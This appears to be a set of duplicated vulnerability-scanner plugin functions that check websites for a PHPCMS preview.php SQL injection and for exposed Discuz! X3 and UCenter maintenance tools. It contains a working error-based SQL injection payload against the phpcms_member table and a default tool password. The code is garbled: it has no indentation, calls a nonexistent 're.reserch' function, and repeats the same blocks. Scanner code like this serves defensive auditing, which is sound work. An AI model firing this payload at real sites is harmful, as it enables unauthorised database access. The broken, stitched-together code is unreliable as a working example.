def Audit(services):
url = services['url'] +"/preview.php?info[catid]=15&content=a[page]b&info[contentid]=2' and (select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,md5(1),0x3a,md5(1),0x27,0x7e) from phpcms_member limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)-- a"
try:
rqu =requests.get(url)
res = rqu.text
m = re.reserch('c4ca4238a0b923820dcc509a6f75849b',res)
if m :
security_hole(url)
except:
pass
def Audit(services):
url = services['url'] +'/source/plugin/tools/tools.php'
try:
rqu =requests.get(url)
if rqu.status_code == 200 :
res = rqu.text
m = re.reserch('Discuz',res)
if m :
security_hole(url+'Discuz! X3 急诊箱,可能存在默认密码:188281MWWxjk')
except:
pass
def Audit(services):
url = services['url'] + '/source/plugin/tools/tools.php'
try:
rqu = requests.get(url)
if rqu.status_code == 200:
res = rqu.text
m = re.reserch('Discuz', res)
if m:
security_hole(url + 'Discuz! X3 急诊箱,可能存在默认密码:188281MWWxjk')
except:
pass
def Audit(services):
url = services['url'] + '/uc_server/uctools.php'
try:
rqu = requests.get(url)
if rqu.status_code == 200:
res = rqu.text
m = re.reserch('Comsenz', res)
if m:
security_hole(url + 'Comsenz 系统维护工具箱(UCenter专用版)')
except:
pass
def Audit(services):
url = services['url'] +'/uc_server/uctools.php'
try:
rqu =requests.get(url)
if rqu.status_code == 200 :
res = rqu.text
m = re.reserch('Comsenz',res)
if m :
security_hole(url+'Comsenz 系统维护工具箱(UCenter专用版)')
except:
pass
def Audit(services):
url = (
services["url"]
+ "/preview.php?info[catid]=15&content=a[page]b&info[contentid]=2' and (select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,md5(1),0x3a,md5(1),0x27,0x7e) from phpcms_member limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)-- a"
)
try:
rqu = requests.get(url)
res = rqu.text
m = re.reserch("c4ca4238a0b923820dcc509a6f75849b", res)
if m:
security_hole(url)
except:
pass
